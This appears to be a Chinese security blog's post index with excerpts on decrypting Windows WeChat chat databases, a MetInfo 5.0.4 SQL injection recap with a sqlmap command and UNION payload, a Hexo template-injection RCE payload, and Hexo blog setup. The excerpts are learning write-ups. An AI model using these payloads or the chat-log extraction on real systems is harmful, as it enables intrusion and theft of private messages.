获取windows微信聊天记录(持续更新偏移地址)
background昨天看到篇文章写的实战中各种密码凭证的获取,其中包括了钓鱼运维然后从微信中获取敏感信息。这一直是我比较感兴趣的模块。在这之前微信聊天记录的数字化我只会聊天记录备份到模拟器然后再解密。说实话没啥太大的应用空间,不管是实战还是取证也好,这个手段都是不现实的。文章里写的手法是直接上windows,然后拿key解密数据库,这确实是一种高效实用的办法。
获取秘钥微信聊天记录数据库存在了wxid_xxxxxxxxxx/msg/Multi/MSG*.db(数据库每达到270m就会生成一个新的,*就是数据库的编号)引导文件是wxid_xxxxxxxxxx/msg/MicroMsg.db我们要做的就是获取到数据库的秘钥,不同版本的windows微信偏移地址不一样。C#编译成exe命令
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc test.cs
源代码
using System;using System.Collections.Generic;using System.Diagn ...
metinfo5.0.4 RCE
background某次线下赛遇见的,然后就想着复盘一下。版本是metinfo5.0.4,我找这个版本找了老一会,后面别人跟我说5.0.4这个版本是4.0升级上去的,所以先装4.0再装5.0.4。
https://www.metinfo.cn/faq/1519.html
此文没任何技术含量,我太菜了,就仅仅是做个学习记录。
前台sql注入漏洞sqlmap命令python sqlmap.py -u "http://metinfo.com/about/show.php?lang=cn&id=15" --dbs --batch
explang=cn&id=-2506 UNION ALL SELECT 68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,CONCAT(0x7170706b71,0x6a58425864747852627a625169766a5643464650676e7170775871566e59585279484263744f496c,0x71716b7871),68, ...
hexo的rce
{{joiner.constructor(“global.process.mainModule.require(‘child_process’).exec(‘Calc.exe’)”)() }}
很鸡肋的洞,不能直接带来啥大的危害。
https://gem-love.com/2023/07/25/hexo%E5%8D%9A%E5%AE%A2%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
我的新博客
backgroundhexo搭建安装git
https://git-scm.com/downloads
安装nodejs
https://nodejs.org/en/
换源
npm config set registry http://registry.npm.taobao.org/
安装(找一个文件夹存放博客的文件,右键-open git bash)
npm install hexo-cli -ghexo inithexo s
主题美化安装各种依赖环境,我这里就直接安所有的包了,直接替换掉package.json里的内容,然后在目录下npm install
{ "name": "hexo-site", "version": "0.0.0", "private": true, "scripts": { "build": "hexo generate", "clean&qu ...